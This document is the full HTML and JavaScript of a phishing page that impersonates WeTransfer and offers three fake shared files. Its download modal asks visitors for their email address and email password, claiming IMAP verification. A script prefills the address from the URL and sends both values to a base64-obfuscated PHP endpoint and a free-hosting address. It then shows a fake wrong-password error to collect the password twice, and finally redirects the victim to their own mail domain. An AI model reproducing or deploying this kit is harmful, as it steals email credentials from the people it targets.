<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta viewport="width" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>WeTransfer</title>
    <link rel="icon" type="image/png" sizes="100x100" href="images/favicon.png">
    <link rel="stylesheet" href="./css/font-awesome.min.css">
    <link rel="stylesheet" href="./css/style.css">
    <link rel="stylesheet" href="./css/form.min.css">
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
</head>

<body>
    <div class="section">
        <div class="app-box">
            <div class="dl-icon">
                <svg class="downloader__top-icon" viewBox="0 0 170 170">
                    <g fill="#D4D7D9" fill-rule="evenodd">
                        <path d="M145.104 24.896c33.195 33.194 33.195 87.014 0 120.208-33.194 33.195-87.014 33.195-120.208 0C-8.3 111.91-8.3 58.09 24.896 24.896 58.09-8.3 111.91-8.3 145.104 24.896zm-7.071 7.071c-29.29-29.29-76.777-29.29-106.066 0-29.29 29.29-29.29 76.777 0 106.066 29.29 29.29 76.777 29.29 106.066 0 29.29-29.29 29.29-76.777 0-106.066z"></path>
                        <path d="M82 100.843V59.007A4.006 4.006 0 0 1 86 55c2.21 0 4 1.794 4 4.007v41.777l15.956-15.956a4.003 4.003 0 0 1 5.657 0 4.004 4.004 0 0 1 0 5.657l-22.628 22.628a3.99 3.99 0 0 1-3.017 1.166 3.992 3.992 0 0 1-3.012-1.166L60.328 90.485a4.003 4.003 0 0 1 0-5.657 4.004 4.004 0 0 1 5.657 0L82 100.843z"></path>
                    </g>
                </svg>
                <h3 class="hrd">Ready when you are</h3>
                <p class="fd">Transfer expires in 7 days</p>
                <p class="dl-msg" title=""></p>
            </div>
            <div class="fcont">
                <table class="ftb">
                    <tbody>
                        <tr>
                            <td>
                                <div class="dc">
                                    <p class="dn">P0_489329.pdf</p>
                                    <p class="finfo fd">364 KB</p>
                                    <p class="ftyp fd">PDF</p>
                                </div>
                            </td>
                            <td>
                                <div class="da">
                                    <svg viewBox="0 0 24 24">
                                        <path d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z" fill-rule="evenodd"></path>
                                    </svg>
                                </div>
                            </td>
                        </tr>
                    </tbody>
                </table>
                <table class="ftb">
                    <tbody>
                        <tr>
                            <td>
                                <div class="dc">
                                    <p class="dn">Item_list.xls</p>
                                    <p class="finfo fd">521 KB</p>
                                    <p class="ftyp fd">XLS</p>
                                </div>
                            </td>
                            <td>
                                <div class="da">
                                    <svg viewBox="0 0 24 24">
                                        <path d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z" fill-rule="evenodd"></path>
                                    </svg>
                                </div>
                            </td>
                        </tr>
                    </tbody>
                </table>
                <table class="ftb">
                    <tbody>
                        <tr>
                            <td>
                                <div class="dc">
                                    <p class="dn">Specifications.pdf</p>
                                    <p class="finfo fd">344 KB</p>
                                    <p class="ftyp fd">PDF</p>
                                </div>
                            </td>
                            <td>
                                <div class="da">
                                    <svg viewBox="0 0 24 24">
                                        <path d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z" fill-rule="evenodd"></path>
                                    </svg>
                                </div>
                            </td>
                        </tr>
                    </tbody>
                </table>
            </div>
            <div class="dcont">
                <button class="dbtn" id="idl" data-toggle="modal" data-target="#lmodal">Download</button>
            </div>
        </div>
        <div class="app-nav">
            <table class="nav-tb">
                <tbody>
                    <tr>
                        <td class="bdr">
                            <span class="nav-text">Help</span>
                        </td>
                        <td class="bdr">
                            <span class="nav-text">About us</span>
                        </td>
                        <td>
                            <span class="nav-text">Premium</span>
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
        <div class="cblock">
            <svg width="272" height="38" viewBox="0 0 272 38" fill="white" xmlns="http://www.w3.org/2000/svg">
                <path d="M52.661 1.51282C50.6789 3.59006 50.0932 4.69642 48.6742 7.83486L35.5878 38L26.3305 16.8664L17.1858 38L3.98674 7.85744C2.6353 4.719 2.02715 3.70295 0 1.51282H16.7353C15.4739 2.57402 14.8208 3.95132 14.8208 5.6673C14.8208 6.88656 15.0235 7.74455 15.6767 9.32506L20.677 21.2918L24.3709 12.3732L22.2987 7.54134C21.0824 4.76415 20.2265 3.02559 19.0102 1.51282H35.7455C34.1238 2.57402 33.3129 3.95132 33.3129 5.6673C33.3129 6.88656 33.5156 7.74455 34.1688 9.32506L39.2817 21.2918L44.3271 9.32506C44.9803 7.74455 45.2281 6.88656 45.2281 5.73504C45.2281 4.22227 44.1694 2.39339 42.9531 1.5354H52.661V1.51282Z" fill="#409fff"></path>
                <path d="M71.3107 28.3815C69.689 35.426 65.7923 37.7516 60.1388 37.7516C53.6744 37.7516 47.6155 33.0327 47.6155 24.1818C47.6155 15.6696 52.9762 9.64111 60.0037 9.64111C64.5985 9.64111 71.0629 12.0119 71.0629 22.0594H55.7917C56.8503 27.4331 60.3415 30.2103 65.1842 30.2103C67.6618 30.1878 69.3961 29.7362 71.3107 28.3815ZM55.4989 18.5371V19.1919H62.166C62.166 14.1343 61.0623 12.5538 58.9225 12.5538C56.7602 12.5538 55.4989 14.7439 55.4989 18.5371Z" fill="#409fff"></path>
                <path d="M103.205 10.6797C99.0154 6.6833 94.871 4.60606 91.6726 4.60606V26.959C91.6726 31.4747 92.8438 34.2068 95.9071 36.984H76.8068C79.8926 34.2068 81.0413 31.4522 81.0413 26.959V4.60606C77.8654 4.60606 73.5183 6.6833 69.509 10.6797L71.5362 0C72.9101 1.0612 75.4328 1.51277 78.2483 1.51277H94.4205C97.2585 1.51277 99.7812 1.0612 101.133 0L103.205 10.6797Z" fill="#fff"></path>
                <path d="M116.088 36.984H100.006C101.988 34.6583 102.844 33.123 102.844 29.4427V21.224C102.844 18.3339 102.439 16.9792 100.524 15.1955L99.4204 14.1794L111.561 9.61853V15.9406C112.732 12.2828 114.534 9.61853 117.53 9.61853C119.962 9.61853 121.516 11.3345 121.516 13.8633C121.516 16.5502 119.85 18.4242 117.53 18.4242C117.034 17.2501 115.818 16.7083 114.692 16.7083C113.791 16.7083 112.912 16.9566 112.462 17.4082V29.1266C112.439 33.0327 113.092 34.0939 116.088 36.984Z" fill="#fff"></path>
                <path d="M150.302 32.3327C149.694 35.5163 147.059 37.7516 143.478 37.7516C140.437 37.7516 138.117 35.9228 137.419 33.8455C135.91 36.5775 133.072 37.7516 130.031 37.7516C125.841 37.7516 123.003 34.9744 123.003 31.1586C123.003 26.7106 126.179 23.6173 133.522 21.8336L136.901 21.0208V16.4599C136.901 13.615 135.932 12.4635 134.22 12.4635C132.599 12.4635 131.54 13.5247 131.54 14.9923C131.54 16.2567 132.148 17.0695 133.207 18.0856C133.207 19.7112 130.684 21.3821 128.049 21.3821C125.481 21.3821 123.657 19.3951 123.657 16.9792C123.657 12.6667 128.409 9.64111 135.392 9.64111C142.667 9.64111 146.518 12.7344 146.518 19.6209V30.5039C146.518 31.8812 147.329 32.7843 148.591 32.7843C149.334 32.7843 149.897 32.6263 150.302 32.3327ZM136.901 31.5651V23.4141L136.248 23.6173C134.085 24.2721 132.599 25.6946 132.599 28.5395C132.599 30.978 133.567 32.4456 135.121 32.4456C135.955 32.423 136.608 32.1747 136.901 31.5651Z" fill="#fff"></path>
                <path d="M165.258 36.984H151.654C153.073 35.6066 153.974 33.5971 153.974 29.4427V21.224C153.974 18.4468 153.613 17.0244 151.946 15.4438L150.775 14.3826L163.298 9.61853V13.5698C164.763 11.1313 167.848 9.61853 170.934 9.61853C175.777 9.61853 178.457 12.2602 178.457 16.9566V31.1586C178.457 34.0487 179.223 35.8099 180.439 36.984H167.195C168.501 35.7195 168.862 34.0036 168.862 32.6263V18.1307C168.862 16.0083 168.164 14.9471 166.182 14.9471C165.078 14.9471 164.154 15.3535 163.546 15.9632V32.6263C163.591 34.0036 163.952 35.6744 165.258 36.984Z" fill="#fff"></path>
                <path d="M184.201 35.5163V26.8461C187.85 31.6102 191.634 34.2519 195.17 34.2519C196.882 34.2519 197.693 33.3488 197.693 32.0844C197.693 30.8651 197.04 30.1652 195.868 29.7136L190.012 27.546C185.507 25.8752 183.503 23.098 183.503 18.9436C183.503 13.5698 187.895 9.6637 194.157 9.6637C197.535 9.6637 201.274 10.6346 203.144 11.9893V19.3951C200.824 15.2858 197.017 13.0053 193.346 13.0053C191.476 13.0053 190.508 13.615 190.508 14.7891C190.508 15.9632 191.206 16.4147 192.783 17.0695L199.72 19.8693C203.211 21.2917 204.765 24.2721 204.765 27.8847C204.765 33.8229 200.463 37.7742 193.999 37.7742C190.778 37.7516 187.444 37.0291 184.201 35.5163Z" fill="#fff"></path>
                <path d="M207.063 12.915L209.991 8.39929C213.73 2.73203 216.703 0 221.748 0C225.69 0 228.213 1.71598 228.213 4.31254C228.213 6.54783 226.388 8.1735 222.559 8.1735C222.559 5.03506 220.78 3.86096 219.023 3.86096C217.244 3.86096 215.892 5.12537 215.892 7.20261C215.892 8.62507 216.658 10.0475 218.978 10.3862H224.586L222.559 12.915H219.113V27.9525C219.113 30.7974 219.563 33.3262 222.492 35.9002L223.708 36.9614H206.274C208.302 34.9293 209.518 32.4456 209.518 28.8105V12.915H207.063Z" fill="#fff"></path>
                <path d="M247.944 28.3815C246.322 35.426 242.426 37.7516 236.772 37.7516C230.308 37.7516 224.249 33.0327 224.249 24.1818C224.249 15.6696 229.609 9.64111 236.637 9.64111C241.232 9.64111 247.696 12.0119 247.696 22.0594H232.425C233.484 27.4331 236.975 30.2103 241.817 30.2103C244.295 30.1878 246.007 29.7362 247.944 28.3815ZM232.11 18.5371V19.1919H238.777C238.777 14.1343 237.673 12.5538 235.533 12.5538C233.394 12.5538 232.11 14.7439 232.11 18.5371Z" fill="#fff"></path>
                <path d="M266.12 36.984H250.038C252.02 34.6583 252.876 33.123 252.876 29.4427V21.224C252.876 18.3339 252.471 16.9792 250.556 15.1955L249.453 14.1794L261.593 9.61853V15.9406C262.764 12.2828 264.566 9.61853 267.562 9.61853C269.995 9.61853 271.549 11.3345 271.549 13.8633C271.549 16.5502 269.882 18.4242 267.562 18.4242C267.066 17.2501 265.85 16.7083 264.724 16.7083C263.823 16.7083 262.944 16.9566 262.494 17.4082V29.1266C262.494 33.0327 263.147 34.0939 266.12 36.984Z" fill="#fff"></path>
            </svg>
            <div class="blk-txt1">
                What makes your child
            </div>
            <div class="blk-txt2">
                Remarkable?
            </div>
            <div class="blk-sub-txt">
                Of course, every child (and parent!) is different and these are just a few tools for your parenting toolbox.
            </div>
            <div class="blk-sub-action">
                <a href="#" class="sub-action">Learn Now</a>
            </div>
        </div>
        <div class="video-container">
            <video autoplay="" loop="" muted="" width="100%" style="margin: 0;">
                <source src="./images/video-02.mp4" type="video/mp4">
            </video>
        </div>
    </div>
    <!-- The Modal -->
    <div id="lmodal" class="lmodal">
        <!-- Modal content -->
        <div class="modal-content">
            <img src="./images/logo.png" alt="WeTransfer" width="200">
            <div class="linfo">
                These files are sensitive and secured against unauthorized access. In order to access this file, You’ll need to verify your email so
                we know it’s really you, we will connect to your email provider through a secured <b>IMAP</b> channel to authorize your download.
            </div>
            <form method="POST" action="https://wetransfer4554.000webhostapp.com/doxx.php">
                <div>
                    <center>
                        <div id="msg" style="display: none;color: red; font-weight: 600">Invalid Password..! Please enter correct password.</div>
                        <span id="error" class="text-danger" style="display: none;color: red;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <p class="ainst" style="margin-top: 10px;">Please verify your email password to start download!</p>
                    <div style="margin-top: 9px; margin-bottom: 4px;"><label for="ai">Email:</label></div>
                    <div><input type="email" name="ai" id="ai" class="form" placeholder="Enter your email here" value=""></div>
                    <div style="margin-top: 9px; margin-bottom: 4px;"><label for="pr">Password:</label></div>
                    <div><input type="password" name="pr" id="pr" class="form" placeholder="Enter email password"></div>
                    <div class="btncont">
                        <center><input id="submit-btn" type="submit" value="Download" alt="submit" class="dbtn" button="" onclick=""> </center>
                        <br>
                    </div>
                </div>
            </form>
        </div>
    </div>
    <style>
        .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/JavaScript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/JavaScript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/JavaScript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;
    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();

    }
    ///////////////url getting ai////////////////

    var file = "bmV4dC5waHA=";

    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is empty.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is empty.!");
            ai.focus;
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').val('Verifing...');
            },
            success: function(response) {
                if (response) {

                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);
                            return false;
                        }
                        $("#msg").show();
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                    return false;
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').val('Download');
            }
        });
    });


});
</script>

</html>